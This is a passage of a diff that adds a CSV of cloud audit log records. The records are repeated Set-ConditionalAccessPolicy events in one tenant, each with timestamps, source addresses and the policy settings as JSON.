+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:33:57Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:53:23Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:28303,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:53:23 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:39:48Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:39:48 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:37:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:37:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:34:15.6926286Z""
+  }
+]"
+2020-05-19T13:39:46Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:39:46 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:36:10Z,,,New-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Organization"",
+    ""Value"": ""NAMPR06A007.PROD.OUTLOOK.COM/Microsoft Exchange Hosted Organizations/seccxpninja.onmicrosoft.com""
+  }
+]"
+2020-05-19T13:35:54Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:35:54 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:34:15.6926286Z""
+  }
+]"
+2020-05-19T13:35:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:35:24 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:34:15.6926286Z""
+  }
+]"
+2020-05-19T13:34:11Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:34:11 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:33:47Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:47 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:33:58Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:33:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:31:42.3802191Z""
+  }
+]"
+2020-05-19T13:29:55Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:29:54 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:41:57Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:9652,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:41:57 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:41:04Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:1303,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""ModifiedDateTime\"":\""2020-05-19T13:39:04.7333386Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\"",\""RequireCompliantDevice\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:41:03 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:40:02Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:19140,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:01 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:40:38Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:9626,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:38 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:41:03Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:9289,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:41:03 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:40:35Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:21368,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:35 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:40:39Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:18024,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:39 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:40:00Z,NT AUTHORITY\SYSTEM (w3wp),52.229.51.154:2771,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:00 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:40:36Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:12288,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""ModifiedDateTime\"":\""2020-05-19T13:31:41.7083504Z\"",\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""Android\"",\""iOS\"",\""macOS\""]}]},\""ClientTypes\"":{\""Include\"":[{\""ClientTypes\"":[\""Browser\"",\""Native\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:40:35 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:38:06Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:30168,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\3b13ea3c-c733-4eb8-bd19-67d308b2ea04""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""CreatedDateTime\"":\""2020-05-19T13:34:15.2394934Z\"",\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""None\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""Guests\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}]}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:38:05 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Yanivsh -CA Test""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-19T13:42:16Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:28000,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:42:15 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:42:18Z,NT AUTHORITY\SYSTEM (w3wp),40.114.117.193:15858,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:42:17 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:42:16Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-05-19T13:28:44.6305974Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/19/2020 1:42:15 PM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""2020-05-19T13:39:05.0146113Z""
+  }
+]"
+2020-05-19T13:42:18Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
